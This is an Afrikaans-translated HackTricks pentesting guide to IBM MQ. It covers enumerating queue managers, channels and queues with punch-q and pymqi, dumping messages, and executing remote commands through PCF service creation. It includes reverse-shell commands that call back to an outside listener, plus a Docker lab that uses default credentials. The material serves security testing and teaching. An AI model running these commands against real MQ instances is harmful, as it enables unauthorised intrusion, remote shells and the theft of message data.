mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 00:20:59 +00:00
345 lines
18 KiB
Markdown
345 lines
18 KiB
Markdown
# 1414 - Pentesting IBM MQ
|
||
|
||
{% hint style="success" %}
|
||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Ondersteun HackTricks</summary>
|
||
|
||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Basiese inligting
|
||
|
||
IBM MQ is 'n IBM tegnologie om boodskap rye te bestuur. Soos ander **boodskap broker** tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers.
|
||
|
||
Standaard, **dit stel IBM MQ TCP poort 1414 bloot**.
|
||
Soms kan HTTP REST API blootgestel word op poort **9443**.
|
||
Metings (Prometheus) kan ook vanaf TCP poort **9157** verkry word.
|
||
|
||
Die IBM MQ TCP poort 1414 kan gebruik word om boodskappe, rye, kanale, ... te manipuleer, maar **ook om die instansie te beheer**.
|
||
|
||
IBM bied 'n groot tegniese dokumentasie beskikbaar op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
|
||
|
||
## Gereedskap
|
||
|
||
'n Voorstel gereedskap vir maklike eksploitatie is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker gebruik. Die gereedskap gebruik aktief die Python biblioteek `pymqi`.
|
||
|
||
Vir 'n meer handmatige benadering, gebruik die Python biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig.
|
||
|
||
### Installeer pymqi
|
||
|
||
**IBM MQ afhanklikhede** moet geïnstalleer en gelaai word:
|
||
|
||
1. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/).
|
||
2. Laai IBM MQ biblioteke af van [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
|
||
3. Decomprimeer (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
|
||
4. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar.
|
||
|
||
>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/comments die volgende lyne (tussen lyne 105-110):
|
||
>
|
||
>```bash
|
||
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
|
||
> then
|
||
> echo "ERROR: This package is incompatible with this system"
|
||
> echo " This package was built for ${BUILD_PLATFORM}"
|
||
> exit 1
|
||
>fi
|
||
>```
|
||
|
||
5. Installeer hierdie pakkette:
|
||
```bash
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
|
||
```
|
||
6. Voeg dan tydelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voor** jy ander gereedskap gebruik wat hierdie afhanklikhede het.
|
||
|
||
Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kode-snippets, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`.
|
||
|
||
### Gebruik punch-q
|
||
|
||
#### Met Docker
|
||
|
||
Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`.
|
||
|
||
#### Sonder Docker
|
||
|
||
Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die readme vir installasie (`pip install -r requirements.txt && python3 setup.py install`).
|
||
|
||
Daarna kan dit gebruik word met die `punch-q` opdrag.
|
||
|
||
## Enumerasie
|
||
|
||
Jy kan probeer om die **queue manager naam, die gebruikers, die kanale en die queues** te enumereer met **punch-q** of **pymqi**.
|
||
|
||
### Queue Manager
|
||
|
||
Soms is daar geen beskerming teen die verkryging van die Queue Manager naam nie:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
|
||
Queue Manager name: MYQUEUEMGR
|
||
```
|
||
### Kanale
|
||
|
||
**punch-q** gebruik 'n interne (veranderbare) woordlys om bestaande kanale te vind. Gebruik voorbeeld:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
|
||
"DEV.ADMIN.SVRCONN" exists and was authorised.
|
||
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
|
||
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
|
||
```
|
||
Dit gebeur dat sommige IBM MQ instansies **onaangetekende** MQ versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangregte ook verskil.
|
||
|
||
Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem.
|
||
|
||
Die opnoeming kan basies gedoen word met hierdie kode-snippet `code/examples/dis_channels.py` van **pymqi**:
|
||
```python
|
||
import logging
|
||
import pymqi
|
||
|
||
logging.basicConfig(level=logging.INFO)
|
||
|
||
queue_manager = 'MYQUEUEMGR'
|
||
channel = 'DEV.ADMIN.SVRCONN'
|
||
host = '172.17.0.2'
|
||
port = '1414'
|
||
conn_info = '%s(%s)' % (host, port)
|
||
user = 'admin'
|
||
password = 'passw0rd'
|
||
|
||
prefix = '*'
|
||
|
||
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
|
||
|
||
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
pcf = pymqi.PCFExecute(qmgr)
|
||
|
||
try:
|
||
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
|
||
except pymqi.MQMIError as e:
|
||
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
|
||
logging.info('No channels matched prefix `%s`' % prefix)
|
||
else:
|
||
raise
|
||
else:
|
||
for channel_info in response:
|
||
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
|
||
logging.info('Found channel `%s`' % channel_name)
|
||
|
||
qmgr.disconnect()
|
||
|
||
```
|
||
... Maar **punch-q** inkorporeer ook daardie deel (met meer inligting!).
|
||
Dit kan begin word met:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
|
||
Showing channels with prefix: "*"...
|
||
|
||
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|
||
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
|
||
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
|
||
| DEV.APP.SVRCONN | Server-connection | app | | | | |
|
||
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
|
||
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
|
||
| SYSTEM.DEF.AMQP | AMQP | | | | | |
|
||
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
|
||
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
|
||
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
|
||
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
|
||
| SYSTEM.DEF.SENDER | Sender | | | | | |
|
||
| SYSTEM.DEF.SERVER | Server | | | | | |
|
||
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
|
||
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
|
||
```
|
||
### Queues
|
||
|
||
Daar is 'n kode-snippet met **pymqi** (`dis_queues.py`) maar **punch-q** laat toe om meer stukke inligting oor die queues te verkry:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
|
||
Showing queues with prefix: "*"...
|
||
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
|
||
| | | | | | GR Name | eue Nam | |
|
||
| | | | | | | e | |
|
||
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
|
||
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | E | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
# Truncated
|
||
```
|
||
## Exploit
|
||
|
||
### Dump boodskappe
|
||
|
||
Jy kan rye(s)/kanaal(e) teiken om boodskappe uit hulle te snuffel / te dump (nie-destructiewe operasie). *Voorbeelde:*
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
|
||
```
|
||
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
|
||
```
|
||
**Moet nie huiwer om op alle geïdentifiseerde rye te iterate nie.**
|
||
|
||
### Kode-uitvoering
|
||
|
||
> Sommige besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Kontroleopdrag. Sommige algemene lyste kan gevind word in [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
|
||
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmeerbare Opdrag Formate***) is waaroor ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies.
|
||
>
|
||
> Jy kan 'n lys van PCF-opdragte vind:
|
||
> * [Van PCF dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en
|
||
> * [van konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
|
||
>
|
||
> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en sy dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem as argument 'n `StartCommand` wat na 'n plaaslike program op die instansie verwys (voorbeeld: `/bin/sh`).
|
||
>
|
||
> Daar is ook 'n waarskuwing van die opdrag in die dokumentasie: *"Let op: Hierdie opdrag laat 'n gebruiker toe om 'n arbitrêre opdrag met mqm gesag uit te voer. As regte toegestaan word om hierdie opdrag te gebruik, kan 'n kwaadwillige of onverskillige gebruiker 'n diens definieer wat jou stelsels of data benadeel, byvoorbeeld deur noodsaaklike lêers te verwyder."*
|
||
>
|
||
> *Nota: altyd volgens IBM MQ dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir dienscreatie (`DEFINE SERVICE`) uit te voer. Hierdie aspek is nog nie hier behandel nie.*
|
||
|
||
Die dienscreatie / -verwydering met PCF vir afstandprogramuitvoering kan gedoen word deur **punch-q**:
|
||
|
||
**Voorbeeld 1**
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
|
||
```
|
||
> In die logs van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is:
|
||
>
|
||
> ```bash
|
||
> 2023-10-10T19:13:01.713Z AMQ5030I: Die Opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
|
||
> ```
|
||
|
||
Jy kan ook bestaande programme op die masjien opnoem (hier `/bin/doesnotexist` ... bestaan nie):
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
||
s "whatever"
|
||
Command: /bin/doesnotexist
|
||
Arguments: -c id
|
||
Service Name: 6e3ef5af652b4436
|
||
|
||
Creating service...
|
||
Starting service...
|
||
The program '/bin/doesnotexist' is not available on the remote system.
|
||
Giving the service 0 second(s) to live...
|
||
Cleaning up service...
|
||
Done
|
||
```
|
||
**Wees bewus dat die programontplooi asynchrone is. So jy het 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer skep op 'n ander diens, data eksfiltrasie deur netwerk ...)***
|
||
|
||
**Voorbeeld 2**
|
||
|
||
Vir 'n maklike omgekeerde dop, **punch-q** bied ook twee omgekeerde dop payloads aan:
|
||
|
||
* Een met bash
|
||
* Een met perl
|
||
|
||
*Natuurlik kan jy 'n pasgemaakte een bou met die `execute` opdrag.*
|
||
|
||
Vir bash:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
|
||
```
|
||
Vir perl:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
|
||
```
|
||
### Custom PCF
|
||
|
||
Jy kan in die IBM MQ dokumentasie delf en direk die **pymqi** python biblioteek gebruik om spesifieke PCF opdragte te toets wat nie in **punch-q** geïmplementeer is nie.
|
||
|
||
**Example:**
|
||
```python
|
||
import pymqi
|
||
|
||
queue_manager = 'MYQUEUEMGR'
|
||
channel = 'DEV.ADMIN.SVRCONN'
|
||
host = '172.17.0.2'
|
||
port = '1414'
|
||
conn_info = '%s(%s)' % (host, port)
|
||
user = 'admin'
|
||
password = 'passw0rd'
|
||
|
||
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
pcf = pymqi.PCFExecute(qmgr)
|
||
|
||
try:
|
||
# Replace here with your custom PCF args and command
|
||
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
|
||
args = {pymqi.CMQCFC.xxxxx: "value"}
|
||
response = pcf.MQCMD_CUSTOM_COMMAND(args)
|
||
except pymqi.MQMIError as e:
|
||
print("Error")
|
||
else:
|
||
# Process response
|
||
|
||
qmgr.disconnect()
|
||
|
||
```
|
||
As jy nie die konstante name kan vind nie, kan jy na die [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors) verwys.
|
||
|
||
> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit benodig die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Dok: ):*
|
||
>
|
||
> ```python
|
||
> import pymqi
|
||
>
|
||
> queue_manager = 'MYQUEUEMGR'
|
||
> channel = 'DEV.ADMIN.SVRCONN'
|
||
> host = '172.17.0.2'
|
||
> port = '1414'
|
||
> conn_info = '%s(%s)' % (host, port)
|
||
> user = 'admin'
|
||
> password = 'passw0rd'
|
||
>
|
||
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
> pcf = pymqi.PCFExecute(qmgr)
|
||
>
|
||
> try:
|
||
> args = {2029: "*"}
|
||
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
|
||
> except pymqi.MQMIError as e:
|
||
> print("Error")
|
||
> else:
|
||
> print(response)
|
||
>
|
||
> qmgr.disconnect()
|
||
> ```
|
||
|
||
## Toetsomgewing
|
||
|
||
As jy die IBM MQ gedrag en exploits wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker:
|
||
|
||
1. Om 'n rekening op ibm.com en cloud.ibm.com te hê.
|
||
2. Skep 'n gekonteiniseerde IBM MQ met:
|
||
```bash
|
||
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
|
||
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
|
||
```
|
||
Deur standaard is die outentisering geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewing veranderlike `MQ_ADMIN_PASSWORD`). Hier is die wagterbestuurder se naam gestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`).
|
||
|
||
Jy moet die IBM MQ aan en loop hê met sy poorte blootgestel:
|
||
```bash
|
||
❯ sudo docker ps
|
||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
|
||
```
|
||
> Die ou weergawe van IBM MQ docker beelde is by: https://hub.docker.com/r/ibmcom/mq/.
|
||
|
||
## References
|
||
|
||
* [mgeeky's gist - "Praktiese IBM MQ Penetrasie Toetsing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
|
||
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
|
||
* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq)
|